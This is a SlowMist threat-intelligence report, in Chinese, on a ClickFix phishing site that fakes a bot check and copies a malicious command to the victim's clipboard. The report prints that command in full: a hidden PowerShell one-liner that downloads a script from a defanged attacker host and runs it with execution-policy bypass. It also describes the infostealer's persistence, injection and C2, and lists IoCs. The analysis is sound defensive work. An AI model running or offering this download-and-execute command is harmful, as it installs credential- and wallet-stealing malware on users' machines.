值得信赖的区块链资讯!
威胁情报:Clickfix 钓鱼攻击
来源:慢雾科技
作者:Joker&Thinking
编辑:KrsMt.&Liz
背景
近日,MistEye 安全监控系统发现一个钓鱼网站,该网站采用 Clickfix 钓鱼攻击技术。这类钓鱼网站主要通过模仿正规网站常用的机器人校验功能,诱导受害者执行恶意命令,达到下载恶意软件的目的。获取到相关恶意样本信息后,慢雾安全团队立即展开分析。
分析过程
访问该钓鱼网站时,会显示正规网站常用的机器人校验功能。
当受害者点击了 checkbox 开始校验后,该钓鱼网站会将恶意命令自动复制到剪贴板中,并且引导受害者按下特定的按键,实现恶意软件的下载与执行。
在这段前端代码中,程序会监听来自 iframe 或父/子窗口的 postMessage 消息。当接收到“turnstileSuccess”消息时,就会调用 copyTextSilently () 方法。
在 index_1.html 页面的前端代码中,做了 checkbox 监听,当受害者正常触发该 checkbox 后,会向父页面发送“turnstileSuccess”消息。
复制恶意命令到剪贴板
在 copyTextSilently() 方法中,首先会去判断是否满足调用 Clipboard API 条件。
如果条件满足,直接调用 Clipboard#writeText() 方法,写入命令到剪贴板中。
如果条件不满足,则先创建一个 <textarea> 元素,把要复制的命令放到 <textarea> 里,然后隐藏元素并添加到页面后,使用 execCommand() 方法复制命令,最后移除元素。
在前端代码中可以看到,command_win 命令是从全局作用域的 window 对象中获取的。根据注释可以知道,window.command_win 可能是在外部脚本 assets/command.js 中定义的。
查看 command.js 文件可知,该文件中确实定义了全局变量 window.command_win,而该命令的主要功能是从远程服务器下载恶意脚本,并通过 PowerShell 在本地隐藏执行。
powershell -w h -c "$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';$p='$env:USERPROFILE\Music\d.ps1';(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"
从前端代码中可以看到,点击 VERIFY 按钮同样会触发 copyTextSilently () 方法,但受浏览器安全限制,受害者在点击 VERIFY 按钮后,还需再次点击网页页面,才能完成恶意命令的复制操作。
分析恶意脚本
$mmASoSdDL 是一个数组,先通过 join 方法拼接为字符串,再对这段 Base64 编码的字符串进行解码,将得到的字节数组转换为 UTF-8 字符串,最后把该 JSON 字符串转换为 PowerShell 对象。
解码后的部分内容如下:
创建隐藏目录
该恶意脚本会先判断目标目录是否存在,若不存在则创建该目录,并将其属性设置为“Hidden”和“System”。
写入恶意文件
该恶意脚本会遍历 JSON 中的 files 数组,根据此前创建的隐藏目录与数组中的 name 字段拼接出完整文件路径,随后将经过 Base64 编码的 b64 字段解码为原始二进制数据,并写入至该完整路径所指向的文件中。
准备自启动
该恶意脚本会在当前受害者的启动文件夹(Startup) 中创建一个名为 trntl.lnk 的快捷方式。此快捷方式指向恶意文件 trntl.exe,并且会设置系统图标进行伪装。快捷方式创建完成后 trntl.exe 便会在受害者登录或开机时自动执行。
延迟执行
该恶意脚本会生成一个随机名称的临时.cmd 文件,在该文件中设置通过 rundll32 调用 ShellExec_RunDLL 来启动 exe。脚本会等待 60 秒,之后通过 cmd.exe/c 执行这个 .cmd 文件,执行完成后再将该 .cmd 文件删除以清理痕迹。
恶意脚本代码
以下是恶意脚本中的主要代码(原代码为连续文本,为增强可读性,已手动换行处理)。
动态分析
将恶意 exe 文件上传至 VirusTotal 沙箱后,从分析结果可知,该文件已被标记为恶意文件。
(https://www.virustotal.com/gui/file/cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039/detection)
进程注入
从 VirusTotal 沙箱的分析结果来看,恶意程序把代码注入到合法进程(regasm.exe) 的内存空间,然后修改目标进程的执行流,让 regasm.exe 执行恶意代码。
敏感信息收集
从 VirusTotal 沙箱的分析结果来看,该恶意程序展现出典型的信息窃取行为,具体表现为对多个浏览器的敏感数据进行搜索,涉及 Chrome、Chromium、Opera 等。其目的可能是为了窃取浏览器中存储的 cookies、钱包、保存的密码等敏感信息;搜索邮件客户端(如 Thunderbird、Windows Mail)的敏感数据,可能是为了获取邮箱账号和邮件内容等敏感信息;搜索加密货币钱包位置,可能是为了窃取私钥、钱包数据等信息以便盗币;搜索 FTP 工具敏感数据,可能是为了获取 FTP 登录凭据等敏感信息。
键盘记录
从 VirusTotal 沙箱的分析结果来看,该恶意程序具备键盘记录功能,能够实时记录受害者的输入内容,其中可能包括账号、密码等敏感信息。
网络通信
从 VirusTotal 沙箱的分析结果来看,该恶意程序先通过 Pastebin 获得 C2 配置,再和 IP 地址 217[.]12[.]204[.]47[:]9000/443 建立通信,可能会上传窃取的敏感数据或接收恶意指令。
访问 https[:]//pastebin[.]com/raw/rzARed3W 返回恶意 IP 地址信息。
在 VirusTotal 平台中,该 IP 和 URL 都已经被标记为恶意地址,且 IP 地址显示为希腊。
(https://www.virustotal.com/gui/ip-address/217.12.204.47)
(https://www.virustotal.com/gui/url/225eceb2f02ba20308d77ac250e85e43fa927b4d51edb5aa3290679fe17ee72d)
总结
需要注意的是,这类钓鱼网站的攻击往往结合社会工程学手段来实现 —— 通过诱导用户执行某些恶意命令,达成下载恶意软件的目的。用户在毫无防备的情况下执行此类命令,可能导致钱包私钥等敏感信息被盗取。
慢雾安全团队在此建议开发者与用户提高对陌生命令的警惕性,若确实需要进行运行调试,务必在独立且无敏感数据的设备环境中操作。
IoCs
IPs
217[.]12[.]204[.]47
SHA256
-
4361fc3a2b6734e5eb0db791b860df370883f420c10c025cfccc00ea7b04e550 —— aTu.lim
-
cfa07032f15a05bc3b3afd4d68059e31e67642ac90062f3584257af1ad730039 —— trntl.exe
-
60475c4304fd87aa1b8129bc278f652b5d3992dd1c7c62138c1475248d69c8e4 —— command.js
Urls
-
https[:]//pastebin[.]com:443/raw/rzARed3W
-
217[.]12[.]204[.]47:443
-
217[.]12[.]204[.]47:9000
-
http[:]//217[.]12[.]204[.]47:9000/wbinjget?q=1C9598DEF70B891C69F5368C134A46A9
-
http[:]//electri[.]billregulator[.]com/aTu.lim
比推快讯
更多 >>- LayerZero Executor 钱包疑遭攻击,损失约 210 万美元
- 半导体板块占标普 500 指数权重升至 20%,创历史新高
- 英国计划 2027 年初前发行首只 G7 数字主权债券
- Apple 智能完成备案,苹果 AI 入华再过一关
- 数据:DePIN 板块总市值较历史高点下跌 83%,年内累计跌幅达 23%
- 长鑫科技:上市后仍将保持无实际控制人的控制权架构
- 美股盘前 SK 海力士下跌 4.6%
- 分析师:SK 海力士 ADR 高溢价反映全球 AI 硬件投资需求强劲
- Hyperliquid 平台交易者 BTC 多头仓位创阶段高位
- Strategy CEO 计划恢复比特币增持并继续增加美元储备
- 数据:比特币 UTXO 亏损比例攀升至极端水平,链上数据显示市场压力加剧
- 分析师:比特币 24 小时上涨 3% 由真实需求驱动,而非空头挤压
- 日本参议院通过《金商法》修正案,加密资产正式被列为金融商品
- 币安将新增 10 种 bStocks 作为抵押品
- Bitget 质押借币新增 39 支股票代币(rToken)作为抵押品
- Bitunix 分析师:市场交易的不只是低通胀,而是政策可信度的重新定价
- 东方金诚:10 年期美债收益率大概率继续抬升
- BTC 长短期持仓比创 30 个月新高,长期持有者持续吸筹
- 巨鲸追踪SK 海力士巨鲸回吐近 90%浮盈,900 万美元空单平仓离场
- 韩媒:三星秘密研究赴美上市可行性公司此前否认相关计划
- 传 Claude Opus5 最快本周发布,填补 Fable5 退场空档
- Anthropic 免费送美国教师一年 Claude,可按 50 州课标备课
- 数据:某巨鲸向 Hyperliquid 存入 500 万美元 USDC,并下达 TWAP 订单以 1 倍杠杆开立 $CXMT 空头头寸
- RootData 发布股票衍生品流动性榜单:币安、Bitget、Bybit 位列前三
- 数据:GMGN 聪明钱 24h 净流入榜,WORLDCUP 居首
- 韩国经济财政部拟立法管理国有资产,涵盖加密货币等新型资产
- 数据:Robinhood Chain 代币 INDEX 市值突破 1600 万美元,近 1 小时翻倍
- 巨鲸追踪美光重返千元解套 TOP 1 多头地址,挂出 1036 万卖单计划清仓离场
- 数据:Coinbase 比特币较币安连续 50 天折价,创最长纪录
- 数据:BarnBridge 治理攻击疑似已造成约 77.6 万美元损失
- DeepSeek 年化收入逼近 5 亿美元,V4 API 毛利率超 50%
- 阿斯麦 Q2 业绩全面超预期,AI 芯片需求成主要驱动力
- 526%溢价与半个 SK 海力士市值,链上为 7.7%市场份额的长鑫投出强信任票
- 韩国国税厅推进 2027 年加密征税准备,国会关于废除相关税制讨论仍停滞
- 预测市场 Kalshi 推出 GPU 价格预测市场,覆盖 Nvidia B200、H200 和 A100 芯片
- Aave Stable Vaults 将采用 Chainlink CCIP 作为跨链基础设施标准
- 长鑫科技合约价快速回落,近 1 小时跌超 11%
- SK 海力士今日绝地反弹,trade.xyz 上资金费率显示投资者或正积极做空
- Hyperliquid 上长鑫存储盘前市值达 5400 亿美元,已超越腾讯
- 持有 7540 万美元资产某巨鲸以 5 倍杠杆做多 2 万枚长鑫存储
- 数据:当前加密恐慌贪婪指数为 26,处于恐慌状态
- Linux 基金会推出 x402 基金会,开发 AI 代理、API 和应用程序开放支付标准
- 数据:比特币现货 ETF 昨日总净流入 1.81 亿美元,贝莱德 IBIT 净流入 1.39 亿美元居首
- 韩国总统:股市急涨后需时间企稳,敦促监管部门应对杠杆 ETF 争议
- Stripe 联合 Advent 出价逾 530 亿美元拟收购 PayPal
- 韩国 KOSPI 指数日内涨 7.94%,SK 海力士现涨 12%
- Hyperliquid 上长鑫存储 7.2 美元附近买单超 590 万美元
- 抢跑长鑫存储定价再度成为市场焦点,HYPE 币价单日反弹超 6%
- 数据:市值前 1000 大加密项目中仅 67 个拥有维基百科页面
- 某鲸鱼清仓套现 CASHCAT,回报率高达 952 倍
比推专栏
更多 >>观点
比推热门文章
- LayerZero Executor 钱包疑遭攻击,损失约 210 万美元
- 半导体板块占标普 500 指数权重升至 20%,创历史新高
- 英国计划 2027 年初前发行首只 G7 数字主权债券
- Apple 智能完成备案,苹果 AI 入华再过一关
- 数据:DePIN 板块总市值较历史高点下跌 83%,年内累计跌幅达 23%
- 长鑫科技:上市后仍将保持无实际控制人的控制权架构
- 美股盘前 SK 海力士下跌 4.6%
- 分析师:SK 海力士 ADR 高溢价反映全球 AI 硬件投资需求强劲
- Hyperliquid 平台交易者 BTC 多头仓位创阶段高位
- Strategy CEO 计划恢复比特币增持并继续增加美元储备
比推 APP


